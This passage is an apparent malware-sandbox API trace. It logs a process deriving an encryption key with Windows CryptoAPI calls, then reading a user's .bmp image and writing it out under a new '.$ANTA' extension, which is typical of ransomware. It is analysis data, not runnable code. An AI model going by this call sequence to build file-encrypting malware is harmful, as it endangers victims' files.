lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0092.039] CryptHashData (hHash=0x41ac6c0, pbData=0x17e2ae8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0092.039] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0092.039] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0092.039] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0092.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0092.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43caa90, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0092.039] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac6c0, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41abfc0) returned 1 [0092.039] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0092.039] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0092.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0092.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796d68, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0092.039] CryptDestroyHash (hHash=0x41ac6c0) returned 1 [0092.039] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\-3KPTEtzyngOb.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\-3kptetzyngob.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0092.040] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.040] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0092.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0092.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0092.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0092.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0092.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0092.040] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0092.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0092.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0092.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0092.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0092.040] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0092.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0092.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0092.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0092.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0092.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0092.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0092.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431dc08 | out: hHeap=0x1780000) returned 1 [0092.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0092.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0092.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0092.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0092.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0092.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0092.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0092.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0092.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0092.041] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz")) returned 0x10 [0092.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a3a0 | out: hHeap=0x1780000) returned 1 [0092.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0092.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0092.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0092.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0092.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0092.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0092.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0092.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0092.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0092.042] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\-3KPTEtzyngOb.bmp.$ANTA" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\-3kptetzyngob.bmp.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0092.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0092.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0092.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0092.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0092.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0092.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0092.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0092.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0092.043] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0092.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0092.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0092.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0092.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0092.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0092.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0092.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0092.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0092.043] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0092.043] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0092.043] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0092.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0092.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0092.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0092.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0092.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0092.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0092.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0092.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0092.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0092.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0092.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0092.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0092.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0092.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0092.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0f020 [0092.047] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0092.047] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x451, lpOverlapped=0x0) returned 1 [0092.048] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0092.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0092.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0092.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0092.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0092.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x451) returned 0x43e8a88 [0092.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0f020 | out: hHeap=0x1780000) returned 1 [0092.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0092.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0092.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0092.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0092.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0092.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x451) returned 0x43e8ee8 [0092.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8a88 | out: hHeap=0x1780000) returned 1 [0092.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0092.052] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0092.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0092.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0092.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0092.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0092.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x451) returned 0x43e8a88 [0092.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0092.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8a88 | out: hHeap=0x1780000) returned 1 [0092.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0092.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0092.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0092.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0092.052] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0092.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0092.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0092.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0092.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0092.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0092.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0092.053] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0092.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0092.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ea8 [0092.053] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0092.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ea8 | out: hHeap=0x1780000) returned 1 [0092.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0092.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0092.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2650 [0092.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0092.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0092.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0092.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0092.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x451) returned 0x43e8a88 [0092.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0092.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2680 [0092.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0092.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0092.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0092.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25e0 [0092.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0092.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0092.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0092.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26c0 [0092.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0092.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0092.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0092.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7d8 [0092.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0092.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0092.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0092.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0092.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0092.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x451) returned 0x43fd3b8 [0092.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0092.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0092.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0092.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0092.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0092.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0092.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0092.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0092.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0092.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0092.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0092.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0092.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0092.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0092.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0092.055] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0092.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0092.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0092.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0092.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0092.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0092.055] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0092.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0092.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0092.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0092.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0092.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0092.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0092.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0092.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0092.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0092.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0092.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0092.056] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0092.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0092.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0092.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0092.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2840 [0092.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0092.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0092.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0092.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0092.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa48 [0092.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0092.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0092.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0092.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0092.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0092.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0092.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0092.056] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0092.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0092.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0092.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 